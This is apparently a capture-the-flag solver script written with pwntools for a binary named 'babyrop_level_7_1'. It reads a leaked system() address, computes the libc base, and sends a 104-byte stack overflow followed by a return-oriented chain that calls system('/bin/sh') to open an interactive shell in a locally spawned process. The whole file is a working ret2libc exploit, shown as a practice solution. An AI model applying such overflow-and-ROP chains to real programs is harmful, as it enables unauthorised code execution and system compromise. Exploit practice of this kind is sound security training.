#!/usr/bin/python3
"""Solver script for the ``babyrop_level_7_1`` binary.

Reads one address the target prints after the ``[LEAK]`` marker, derives the
libc base from it, and sends a fixed-size overflow followed by a short
return-oriented chain. The script only talks to a locally spawned process.
"""
from pwn import *
import re

# Make the challenge binary the default for process() and for p64() word size.
context.binary = target = ELF("./babyrop_level_7_1", checksec=False)
libc = target.libc  # NOTE(review): may be None if pwntools cannot resolve the libc — confirm before relying on .sym
r = process()

# Single gadget address used below; the page gives no disassembly for it.
POP_RDI = 0x401ec3
OVERFLOW_LEN = 104  # bytes of filler before the saved return address

# --- read the leaked address -------------------------------------------------
r.recvuntil(b"[LEAK]")
leak_line = r.recvlineS()
hex_tokens = re.findall(r'0x[a-z0-9]+', leak_line)
system = int(hex_tokens[0], 16)  # IndexError here means no address was printed
log.info("system: %#x", system)

# Rebase libc from the leaked system() address, then locate a "/bin/sh" string.
libc.address = system - libc.sym.system
log.info("libc: %#x", libc.address)
binsh = next(libc.search(b"/bin/sh"))

# --- build and send the chain ------------------------------------------------
payload = b"".join([
    b"A" * OVERFLOW_LEN,
    p64(POP_RDI),
    p64(binsh),
    p64(POP_RDI + 1),  # extra gadget placed before system; confirm against disassembly
    p64(system),
])
r.sendline(payload)
r.interactive()